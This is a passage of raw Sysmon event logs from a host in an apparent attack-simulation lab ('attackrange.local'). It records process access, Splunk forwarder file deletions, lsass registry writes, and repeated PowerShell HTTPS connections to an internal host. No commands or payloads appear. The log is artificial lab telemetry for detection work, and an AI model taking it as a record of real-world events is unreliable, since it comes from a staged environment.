13:15:07.968{B81B27B7-A05B-6140-6E56-04000000C801}5448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:07.905{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD730C26B838EAA8822A665927BE9587,SHA256=4B51008F0AD535876391906BCB17605A3CD5A8892D1926941B3CB09357818845,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496962Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.989{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ECF008A786C0E164F6AA5160EA3BE716,SHA256=990D1DBC48F93AAE853129C21E7C50DBD033BE503C32C74062DE533AA6CFCC24,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496961Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.989{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BFA0E93C222C766D6E699F3C0ECD7C08,SHA256=8256191867459DF289EA222FAC916B26B143EA1188D63A63249430055EF1F952,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.920{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42E0CD21D7ABDB35EBD5C2B282AA1C84,SHA256=FF586ED075D201A51B75C85DB67A23A854D4E82CAFCD026CC1DBE278D71B5343,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.670{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A05C-6140-6F56-04000000C801}1740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.669{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.669{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.668{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.668{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.668{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A05C-6140-6F56-04000000C801}1740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.668{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A05C-6140-6F56-04000000C801}1740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.652{B81B27B7-A05C-6140-6F56-04000000C801}1740C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000036496951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.688{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50480-false10.0.1.12-8000- 10341000x800000000000000036496950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:08.170{B81B27B7-A05B-6140-6E56-04000000C801}54486660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036496963Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:09.934{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=034F478B57941DED869935E560019BF2,SHA256=AC0D44B42CE44137C80FFF7D9514968D038536B1597B42689489E1315CA29CAC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496966Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:10.967{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36DA9703BBF05FAFF643EECBE9FA9A22,SHA256=ACAB8BFF0C3086A066793DA70F6C8F0E57AED3DEC3B425E32930D00FEAB8A96D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496965Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:40.571{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50481-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496964Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:10.118{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5CFC2584E7697EDB616D42B43F7742C1,SHA256=46132C3A38983D0984AFD726EDB93A20B6D6DAAD9B02AF011D358563F5AE0AD4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496967Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:11.985{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=233C06D9DF1CC7D95090C04446F5C718,SHA256=89C45B58CE53BE81D389DC8175F3D5DED56D851E25BB9CEAF0A456EDF807D007,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496969Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:42.931{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50482-false10.0.1.12-8000- 23542300x800000000000000036496968Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:13.031{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75180E5CDB978BA6BC85A9A5EF38173E,SHA256=989364E7466E777548DCF64C57774E74871BEE811E61133F50F53F44F791A314,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496970Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:14.046{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64DC80AC3D3EF8BA5092E9268095BB9F,SHA256=ADE0A96DD94A60DDFDEA113FCD36DFEBFA6B7D28F590AAA09BCA8F20206A59EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:45.581{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50483-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 13241300x800000000000000036496982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000036496981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x8a30c771) 13241300x800000000000000036496980Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a962-0x2cfc4b87) 13241300x800000000000000036496979Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a96a-0x8ec0b387) 13241300x800000000000000036496978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a972-0xf0851b87) 13241300x800000000000000036496977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000036496976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x8a30c771) 13241300x800000000000000036496975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a962-0x2cfc4b87) 13241300x800000000000000036496974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a96a-0x8ec0b387) 13241300x800000000000000036496973Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-14 13:15:15.198{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a972-0xf0851b87) 23542300x800000000000000036496972Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:15.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D1502A063D421E9E72331519D7D8635C,SHA256=F976D21317C434A23D4E387051BEBA26736405A39CD0EC7083F093A8B104FB5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496971Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:15.098{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=651F8F3DD4517AD5152D5772589D6832,SHA256=B43AD5D914E5EFC41657B5EE9F87BF14D4782448B18AA781F10F022A845856DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:16.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C5011B3348C8B0116E9A00A4678FC69,SHA256=51839282B9D98B34D967BFBCEB996063D6937EEB8DD6361047D9C1704FF09287,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:17.128{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D8D17EBCB66CF33C141FB90F696C3BB,SHA256=0F5A2524431A906E58A790CA13B7E2232C795B7E18E60E363B449805C8EC8179,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:18.679{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497012Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 